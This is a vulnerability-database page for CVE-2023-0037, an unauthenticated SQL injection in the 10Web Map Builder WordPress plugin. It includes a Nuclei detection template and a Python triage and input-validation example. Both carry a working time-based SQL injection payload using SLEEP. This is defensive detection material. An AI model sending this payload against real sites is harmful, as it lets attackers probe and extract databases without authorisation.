
WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection

CVE-2023-0037
Verified

Description

The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Severity

Critical

CVSS Score

9.8

Exploit Probability

62%

Affected Product

map_builder_for_google_maps

Published Date

September 10, 2025

Template Author

riteshs4hu

CVE-2023-0037.yaml
id: CVE-2023-0037

info:
  name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  impact: |
    Unauthenticated attackers can execute SQL injection through AJAX actions to extract the complete WordPress database including user credentials, map configuration data, and sensitive site information.
  remediation: Fixed in 1.0.73
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0037
    - https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
    - https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0037
    cwe-id: CWE-89
    epss-score: 0.61728
    epss-percentile: 0.98369
    cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: map_builder_for_google_maps
    framework: wordpress
    zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(body, "wd-google-maps")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4b0a00483046022100e92dd84281274694526595f6a9504c812b7d4823472c84afc10bb90f449ab96a022100e9841607fa4c665672e76fb119c82b70ff04d01388687606ad3dc14d96314a73:922c64590222798bb761d5b6d8e72950
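The template above decides on three ANDed conditions: a response delay of at least 7 seconds, the plugin marker "wd-google-maps" in the body, and an HTML content type. The following is an added example, not part of the template or the plugin, that applies the same decision to constructed proxy-style request records and pairs it with the input validation a patched handler would perform (radius, lat and lng must be plain numbers; the distance_in allow-list of km/mi is an assumption, the template only sends km).

```python
import re
from urllib.parse import parse_qs

NUMERIC = re.compile(r"^-?\d+(\.\d+)?$")
UNITS = {"km", "mi"}  # assumed allow-list; the template only uses "km"

# Constructed records of the kind a reverse proxy or WAF might keep for the
# AJAX endpoint: POST body, response time in seconds, content type, body text.
SAMPLE_RECORDS = [
    {"body": "radius=5&lat=48.1&lng=11.5&distance_in=km", "duration": 0.3,
     "content_type": "text/html; charset=UTF-8", "response": "wd-google-maps markers"},
    {"body": "radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km",
     "duration": 7.4, "content_type": "text/html; charset=UTF-8", "response": "wd-google-maps markers"},
    {"body": "radius=5&lat=48.1&lng=11.5&distance_in=km", "duration": 7.9,
     "content_type": "application/json", "response": '{"ok":true}'},
]

def malformed_params(body):
    """Names of parameters whose value is not a plain number or a known unit.
    A fixed handler rejects exactly these before any SQL statement is built."""
    params = parse_qs(body, keep_blank_values=True)  # '+' decodes to a space
    bad = []
    for name in ("radius", "lat", "lng"):
        for value in params.get(name, [""]):
            if not NUMERIC.match(value):
                bad.append(name)
    for value in params.get("distance_in", [""]):
        if value not in UNITS:
            bad.append("distance_in")
    return bad

def template_matches(record):
    """The three conditions the Nuclei template ANDs together."""
    return (record["duration"] >= 7
            and "wd-google-maps" in record["response"]
            and "text/html" in record["content_type"])

def triage(records):
    """Label each record: exploit-attempt, malformed, slow-but-benign, or ok."""
    out = []
    for rec in records:
        bad = malformed_params(rec["body"])
        if bad and template_matches(rec):
            out.append(("exploit-attempt", bad))
        elif bad:
            out.append(("malformed", bad))
        elif rec["duration"] >= 7:
            out.append(("slow-but-benign", []))  # slow, but inputs were clean
        else:
            out.append(("ok", []))
    return out
```

Only the second record is flagged as an exploit attempt; the third is slow but its parameters are clean and its response is JSON, so the template's own logic would not have matched it either.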

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2023-0037
CWE ID:
CWE-89

References

https://nvd.nist.gov/vuln/detail/CVE-2023-0037
https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
https://bulletin.iese.de/post/wd-google-maps_1-0-72_1

Remediation Steps

Fixed in 1.0.73